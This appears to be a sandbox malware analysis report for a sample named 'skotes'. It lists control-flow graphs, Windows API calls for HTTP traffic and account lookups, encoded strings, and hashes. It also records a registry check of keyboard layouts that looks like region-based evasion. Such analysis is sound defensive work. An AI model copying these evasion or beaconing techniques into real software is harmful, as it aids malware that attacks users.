                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSendSleep
                                                                                                                                                                                                                                                • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$RE1NXF==$RmNn$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                                • API String ID: 2167506142-2254971868
                                                                                                                                                                                                                                                • Opcode ID: bec4efa724f5079050ef378385ab7b3f2938cf0360ef6f9808d3a2c81d098145
                                                                                                                                                                                                                                                • Instruction ID: 51f88aaaa4d92a32c41d2a20a418aeafc87deba96f7def3a3f229f789f7a33bc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bec4efa724f5079050ef378385ab7b3f2938cf0360ef6f9808d3a2c81d098145
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F6B1D5B1A001189BDB28DF28CCC5BEE7BA5EF45304F50419EF50997281D7799AC4CBA9

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1470 4b65e0-4b6639 1544 4b663a call 53602a0 1470->1544 1545 4b663a call 536032e 1470->1545 1546 4b663a call 53602bc 1470->1546 1547 4b663a call 536027a 1470->1547 1548 4b663a call 53602eb 1470->1548 1549 4b663a call 5360288 1470->1549 1550 4b663a call 5360309 1470->1550 1551 4b663a call 53602d9 1470->1551 1471 4b663f-4b66b8 LookupAccountNameA call 4c7a00 call 4b5c10 1477 4b66ba 1471->1477 1478 4b66bc-4b66db call 4b22c0 1471->1478 1477->1478 1481 4b66dd-4b66ec 1478->1481 1482 4b670c-4b6712 1478->1482 1483 4b66ee-4b66fc 1481->1483 1484 4b6702-4b6709 call 4cd663 1481->1484 1485 4b6715-4b671a 1482->1485 1483->1484 1486 4b6937 call 4e6c6a 1483->1486 1484->1482 1485->1485 1488 4b671c-4b6744 call 4c7a00 call 4b5c10 1485->1488 1492 4b693c call 4e6c6a 1486->1492 1498 4b6748-4b6769 call 4b22c0 1488->1498 1499 4b6746 1488->1499 1497 4b6941-4b6946 call 4e6c6a 1492->1497 1504 4b676b-4b677a 1498->1504 1505 4b679a-4b67ae 1498->1505 1499->1498 1506 4b677c-4b678a 1504->1506 1507 4b6790-4b6797 call 4cd663 1504->1507 1511 4b6858-4b687c 1505->1511 1512 4b67b4-4b67ba 1505->1512 1506->1492 1506->1507 1507->1505 1513 4b6880-4b6885 1511->1513 1514 4b67c0-4b67ed call 4c7a00 call 4b5c10 1512->1514 1513->1513 1515 4b6887-4b68ec call 4c80c0 * 2 1513->1515 1527 4b67ef 1514->1527 1528 4b67f1-4b6818 call 4b22c0 1514->1528 1525 4b6919-4b6936 call 4ccff1 1515->1525 1526 4b68ee-4b68fd 1515->1526 1529 4b690f-4b6916 call 4cd663 1526->1529 1530 4b68ff-4b690d 1526->1530 1527->1528 1537 4b681a-4b6829 1528->1537 1538 4b6849-4b684c 1528->1538 1529->1525 1530->1497 1530->1529 1539 4b682b-4b6839 1537->1539 1540 4b683f-4b6846 call 4cd663 1537->1540 1538->1514 1541 4b6852 1538->1541 1539->1486 1539->1540 1540->1538 1541->1511 1544->1471 1545->1471 1546->1471 1547->1471 1548->1471 1549->1471 1550->1471 1551->1471
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 004B6680
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                                                • String ID: GSTmfV==$ISNmfV==$RySfdMLx
                                                                                                                                                                                                                                                • API String ID: 1484870144-2309319047
                                                                                                                                                                                                                                                • Opcode ID: e90afc330cd0fefabf4dc087026ebc2a8bc4716dc21474193b9808a1e8cfb661
                                                                                                                                                                                                                                                • Instruction ID: f8d38761090fd6c99f4c7deae25879e160e2d8e08a3db1b981f77851aeed48c8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e90afc330cd0fefabf4dc087026ebc2a8bc4716dc21474193b9808a1e8cfb661
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5791B2B1A001189BDB28DF28CC85BDDB779EB45304F5045EEE51997282DB399BC4CFA8

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1857 4cd3e2-4cd3e5 1858 4cd3f4-4cd3f7 call 4e8be1 1857->1858 1860 4cd3fc-4cd3ff 1858->1860 1861 4cd3e7-4cd3f2 call 4e8e36 1860->1861 1862 4cd401-4cd402 1860->1862 1861->1858 1865 4cd403-4cd407 1861->1865 1866 4cd40d-4cddae call 4cac11 call 4e3b04 call 4f7d05 1865->1866 1867 4b2480-4b24d0 call 4b23c0 call 4e3b04 call 4e38af 1865->1867 1881 4cdf5d-4cdf60 1866->1881 1882 4cddb4-4cde19 1866->1882 1883 4cde5e 1882->1883 1884 4cde1b-4cde28 1882->1884 1885 4cde64-4cde70 1883->1885 1886 4cde4d-4cde5c 1884->1886 1887 4cde2a-4cde2f 1884->1887 1888 4cdea1 1885->1888 1889 4cde72-4cde94 1885->1889 1886->1885 1887->1886 1890 4cde31-4cde36 1887->1890 1891 4cdea4-4cdec1 1888->1891 1889->1891 1892 4cde96-4cde9f 1889->1892 1890->1886 1893 4cde38-4cde3d 1890->1893 1895 4cdf5a-4cdf5c 1891->1895 1896 4cdec7-4cdedf 1891->1896 1892->1891 1893->1886 1894 4cde3f-4cde44 1893->1894 1894->1886 1897 4cde46-4cde4b 1894->1897 1895->1881 1896->1895 1898 4cdee1-4cdee7 1896->1898 1897->1883 1897->1886 1898->1895 1899 4cdee9-4cdf01 1898->1899 1899->1895 1900 4cdf03-4cdf1d 1899->1900 1900->1895 1901 4cdf1f-4cdf3a 1900->1901 1901->1895 1902 4cdf3c-4cdf4b 1901->1902 1902->1895 1903 4cdf4d-4cdf54 1902->1903 1903->1895
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ___std_exception_copy.LIBVCRUNTIME ref: 004B24BE
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2659868963-0
                                                                                                                                                                                                                                                • Opcode ID: 624ae1095bdcbf2c6a139f11780a99d632b29db2d8286000a9c41f9f4aa98a18
                                                                                                                                                                                                                                                • Instruction ID: bcb7a3a99245eb528e81e130ee4520a0492099730d9e4035dd102ed288a052c1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 624ae1095bdcbf2c6a139f11780a99d632b29db2d8286000a9c41f9f4aa98a18
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB51BC76D0060ACBDB55CF59D8C5BAABBB1FB58314F20852ED409EB350E338A944CF98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestSleep
                                                                                                                                                                                                                                                • String ID: 2I0$ 3I3eB==$ GE0$ jS=$246122658369$8WI0$9250$93E0$9HQ0$9c9aa5$Fw==$KCWUOl==$MGE+$MGI+$VXA0$VXQ0$Vmc0$WGS0$aWW0$anE0$stoi argument out of range
                                                                                                                                                                                                                                                • API String ID: 3516211189-1982281295
                                                                                                                                                                                                                                                • Opcode ID: 7d09ac3767e9a0f926696a3858edf98cd357ded298248da5a9d5f2f34b21efd2
                                                                                                                                                                                                                                                • Instruction ID: 0ed861b3ccb176243fa5be5e397cdb9e29e3d85f45e2c17df541106427c718f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d09ac3767e9a0f926696a3858edf98cd357ded298248da5a9d5f2f34b21efd2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8233670E002548BEB19DB28CE89B9DBB76AB82304F5481DDE049A72D2DB395FC4CF55

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 766 4c2f10-4c351c call 4c7a00 call 4b5c10 call 4c7a00 * 4 call 4be530 783 4c351e-4c352a 766->783 784 4c354a-4c3562 766->784 785 4c352c-4c353a 783->785 786 4c3540-4c3547 call 4cd663 783->786 787 4c3564-4c3570 784->787 788 4c3590-4c35a8 784->788 785->786 789 4c3639-4c3679 call 4e6c6a 785->789 786->784 791 4c3586-4c358d call 4cd663 787->791 792 4c3572-4c3580 787->792 793 4c35aa-4c35b6 788->793 794 4c35d2-4c35ea 788->794 813 4c367f-4c37b0 call 4c80c0 * 4 call 4c7a00 call 4b5c10 789->813 814 4c4250-4c4256 789->814 791->788 792->789 792->791 800 4c35c8-4c35cf call 4cd663 793->800 801 4c35b8-4c35c6 793->801 795 4c35ec-4c35f8 794->795 796 4c3614-4c362e call 4ccff1 794->796 802 4c360a-4c3611 call 4cd663 795->802 803 4c35fa-4c3608 795->803 800->794 801->789 801->800 802->796 803->789 803->802 852 4c37b4-4c381e call 4c8ba0 call 4c80c0 813->852 853 4c37b2 813->853 815 4c4258-4c4264 814->815 816 4c4284-4c429c 814->816 818 4c427a-4c4281 call 4cd663 815->818 819 4c4266-4c4274 815->819 820 4c429e-4c42aa 816->820 821 4c42ca-4c42e2 816->821 818->816 819->818 826 4c4363 call 4e6c6a 819->826 828 4c42ac-4c42ba 820->828 829 4c42c0-4c42c7 call 4cd663 820->829 824 4c430c-4c4326 call 4ccff1 821->824 825 4c42e4-4c42f0 821->825 832 4c4302-4c4309 call 4cd663 825->832 833 4c42f2-4c4300 825->833 828->826 828->829 829->821 832->824 833->826 833->832 859 4c384f-4c3874 call 4b98f0 852->859 860 4c3820-4c382f 852->860 853->852 867 4c3d58-4c3d5e 859->867 868 4c387a-4c38e2 call 4c7a00 call 4b5c10 call 4c80c0 859->868 861 4c3845-4c384c call 4cd663 860->861 862 4c3831-4c383f 860->862 861->859 862->861 869 4c3d8c-4c3d92 867->869 870 4c3d60-4c3d6c 867->870 906 4c38e4 868->906 907 4c38e6-4c391d call 4c9470 868->907 872 4c3d94-4c3da0 869->872 873 4c3dc0-4c3dc6 869->873 874 4c3d6e-4c3d7c 870->874 875 4c3d82-4c3d89 call 4cd663 870->875 877 4c3db6-4c3dbd call 4cd663 872->877 878 4c3da2-4c3db0 872->878 879 4c3dc8-4c3dd4 873->879 880 4c3df4-4c3e0c 873->880 874->875 881 4c4354 call 4e6c6a 874->881 875->869 877->873 878->877 878->881 888 4c3dea-4c3df1 call 4cd663 879->888 889 4c3dd6-4c3de4 879->889 890 4c3e3d-4c3e43 880->890 891 4c3e0e-4c3e1d 880->891 895 4c4359-4c435e call 4cc1d9 881->895 888->880 889->881 889->888 890->814 893 4c3e49-4c3e55 890->893 897 4c3e1f-4c3e2d 891->897 898 4c3e33-4c3e3a call 4cd663 891->898 901 4c3e5b-4c3e69 893->901 902 4c4246-4c424d call 4cd663 893->902 895->826 897->881 897->898 898->890 901->881 909 4c3e6f 901->909 902->814 906->907 913 4c391f-4c392a 907->913 914 4c394a-4c3957 907->914 909->902 915 4c392c-4c393a 913->915 916 4c3940-4c3947 call 4cd663 913->916 917 4c3988-4c398f 914->917 918 4c3959-4c3968 914->918 915->916 921 4c4336 call 4e6c6a 915->921 916->914 919 4c3995-4c39b7 917->919 920 4c3b53-4c3b83 call 4e75f6 call 4e8ab6 917->920 923 4c397e-4c3985 call 4cd663 918->923 924 4c396a-4c3978 918->924 926 4c39bd-4c39ef call 4c80c0 call 4bad70 919->926 927 4c433b call 4c8200 919->927 943 4c3b89-4c3b8c 920->943 944 4c434a-4c434f call 4cc199 920->944 921->927 923->917 924->921 924->923 948 4c3a47-4c3a50 926->948 949 4c39f1-4c39f7 926->949 937 4c4340 call 4e6c6a 927->937 941 4c4345 call 4e6c6a 937->941 941->944 943->895 945 4c3b92-4c3b95 943->945 944->881 945->867 950 4c3b9b 945->950 951 4c3a81-4c3ac1 call 4c7a00 * 2 call 4b49a0 948->951 952 4c3a52-4c3a61 948->952 953 4c39f9-4c3a05 949->953 954 4c3a25-4c3a44 949->954 955 4c3c8d-4c3d4d call 4c80c0 call 4c7a00 call 4b5c10 call 4c7a00 * 5 call 4c1ec0 950->955 956 4c3e74-4c3f3d call 4c80c0 call 4c7a00 call 4b5c10 call 4c7a00 * 5 950->956 957 4c3ba2-4c3c67 call 4c80c0 call 4c7a00 call 4b5c10 call 4c7a00 * 5 950->957 958 4c3f42-4c3f9c call 4c7a00 * 4 call 4c2f10 950->958 995 4c3b19-4c3b22 951->995 996 4c3ac3-4c3ac9 951->996 959 4c3a77-4c3a7e call 4cd663 952->959 960 4c3a63-4c3a71 952->960 962 4c3a1b-4c3a22 call 4cd663 953->962 963 4c3a07-4c3a15 953->963 954->948 1047 4c3d52 955->1047 1044 4c3c6b-4c3c7d call 4c7a00 call 4c08e0 956->1044 957->1044 1022 4c3fa1-4c3fa4 958->1022 959->951 960->937 960->959 962->954 963->937 963->962 995->920 999 4c3b24-4c3b33 995->999 1002 4c3acb-4c3ad7 996->1002 1003 4c3af7-4c3b16 996->1003 1008 4c3b49-4c3b50 call 4cd663 999->1008 1009 4c3b35-4c3b43 999->1009 1012 4c3aed-4c3af4 call 4cd663 1002->1012 1013 4c3ad9-4c3ae7 1002->1013 1003->995 1008->920 1009->941 1009->1008 1012->1003 1013->941 1013->1012 1022->867 1050 4c3c82-4c3c88 1044->1050 1047->867 1050->867
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                                                                                                                                                                                                                • String ID: "$246122658369$5120$Fw==$Hykl$V2Te$WGpm$WTw=$WX f$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                                • API String ID: 4078500453-1402436090
                                                                                                                                                                                                                                                • Opcode ID: 4c690aeb86c3d8604cec3844e50aaac8dff3fc2c559037d30bbc01a2aea04213
                                                                                                                                                                                                                                                • Instruction ID: 4031662c18a859e24e7ac398f62869e45834d70de246de6776381f9c150c7d33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c690aeb86c3d8604cec3844e50aaac8dff3fc2c559037d30bbc01a2aea04213
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6B725774A002489BDF18EF79CD46FDDBBB1AF46304F50819EE405A7382D7399B848B96

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1231 4b5ee0-4b5fde RegOpenKeyExA 1236 4b6008-4b6015 call 4ccff1 1231->1236 1237 4b5fe0-4b5fec 1231->1237 1239 4b5ffe-4b6005 call 4cd663 1237->1239 1240 4b5fee-4b5ffc 1237->1240 1239->1236 1240->1239 1242 4b6016-4b619d call 4e6c6a call 4ce150 call 4c80c0 * 5 RegOpenKeyExA 1240->1242 1259 4b61a3-4b6233 call 4e40f0 1242->1259 1260 4b64b1-4b64ba 1242->1260 1286 4b6239-4b623d 1259->1286 1287 4b649f-4b64ab 1259->1287 1262 4b64bc-4b64c7 1260->1262 1263 4b64e7-4b64f0 1260->1263 1267 4b64c9-4b64d7 1262->1267 1268 4b64dd-4b64e4 call 4cd663 1262->1268 1264 4b651d-4b6526 1263->1264 1265 4b64f2-4b64fd 1263->1265 1271 4b6528-4b6533 1264->1271 1272 4b6553-4b655c 1264->1272 1269 4b64ff-4b650d 1265->1269 1270 4b6513-4b651a call 4cd663 1265->1270 1267->1268 1273 4b65d7-4b65df call 4e6c6a 1267->1273 1268->1263 1269->1270 1269->1273 1270->1264 1277 4b6549-4b6550 call 4cd663 1271->1277 1278 4b6535-4b6543 1271->1278 1280 4b655e-4b6569 1272->1280 1281 4b6585-4b658e 1272->1281 1277->1272 1278->1273 1278->1277 1290 4b657b-4b6582 call 4cd663 1280->1290 1291 4b656b-4b6579 1280->1291 1283 4b65bb-4b65d6 call 4ccff1 1281->1283 1284 4b6590-4b659f 1281->1284 1292 4b65b1-4b65b8 call 4cd663 1284->1292 1293 4b65a1-4b65af 1284->1293 1295 4b6499 1286->1295 1296 4b6243-4b6279 RegEnumValueA 1286->1296 1287->1260 1290->1281 1291->1273 1291->1290 1292->1283 1293->1273 1293->1292 1295->1287 1303 4b627f-4b629e 1296->1303 1304 4b6486-4b648d 1296->1304 1307 4b62a0-4b62a5 1303->1307 1304->1296 1305 4b6493 1304->1305 1305->1295 1307->1307 1308 4b62a7-4b62fb call 4c80c0 call 4c7a00 * 2 call 4b5d50 1307->1308 1308->1304
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,?), ref: 004B5F13
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2922402588.00000000004B1000.00000040.00000001.01000000.00000007.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922189527.00000000004B0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2922402588.0000000000512000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923453883.0000000000519000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000051B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000006A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.000000000077F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007AB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2923832942.00000000007C2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2927841191.00000000007C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930007833.000000000095E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.2930452154.0000000000960000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_4b0000_skotes.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                                                                                • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                                                                                                • API String ID: 71445658-3963862150
                                                                                                                                                                                                                                                • Opcode ID: 80e594ee98f2e3978a8abc77488e645d29e051c2ba1ab062cfae5299e413e1f9
                                                                                                                                                                                                                                                • Instruction ID: 4d8dda92388fdbb9061ec8bdd6431344f094024b81f98f871c5918fb6931b232
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80e594ee98f2e3978a8abc77488e645d29e051c2ba1ab062cfae5299e413e1f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44D1C171900158ABEB24DF24CC85BDEB7B9AF05304F5042DEE508E7291DB789BA48F69

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
